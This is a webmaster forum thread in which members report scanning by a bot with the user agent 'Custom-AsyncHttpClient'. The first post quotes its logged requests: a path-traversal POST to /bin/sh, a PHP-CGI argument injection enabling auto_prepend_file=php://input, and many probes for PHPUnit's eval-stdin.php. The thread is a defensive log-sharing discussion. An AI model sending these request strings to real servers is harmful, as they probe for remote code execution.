Forum Moderators: open

Message Too Old, No Replies

User-Agent: Custom-AsyncHttpClient

(asked for a lot of crap)

         

SumGuy

2:28 am on Sep 9, 2024 (gmt 0)

5+ Year Member Top Contributors Of The Month



Got this today from 170.231.48.3 (AS265060 - one of Brazil's bazillion autonomous system numbers - there is no end to them - I block them and block them and still there are more of them):

User-agent was simply "Custom-AsyncHttpClient"

POST/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh
POST/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
GET/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
GET/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php
GET/vendor/phpunit/src/Util/PHP/eval-stdin.php
GET/vendor/phpunit/Util/PHP/eval-stdin.php
GET/vendor/phpunit/phpunit/LICENSE/eval-stdin.php
GET/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
GET/phpunit/phpunit/src/Util/PHP/eval-stdin.php
GET/phpunit/phpunit/Util/PHP/eval-stdin.php
GET/phpunit/src/Util/PHP/eval-stdin.php
GET/phpunit/Util/PHP/eval-stdin.php
GET/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php
GET/lib/phpunit/phpunit/Util/PHP/eval-stdin.php
GET/lib/phpunit/src/Util/PHP/eval-stdin.php
GET/lib/phpunit/Util/PHP/eval-stdin.php
GET/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
GET/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
GET/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

There was more of that. All generating 404's.

Another UA added to my server's blocking pile.

lucy24

4:12 am on Sep 9, 2024 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



POST/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
Presumed translation: “Let’s see if the site has a security gap I can drive a truck through.”

Pfui

4:43 am on Sep 9, 2024 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Custom-AsyncHttpClient is one nasty critter. Always asks for scores of php-related stuff in seconds. I've seen it for months coming from all over, legit and iffy ISPs, and always figured it marked an infected machine. If idiots are irresponsibly running it on purpose, grrr...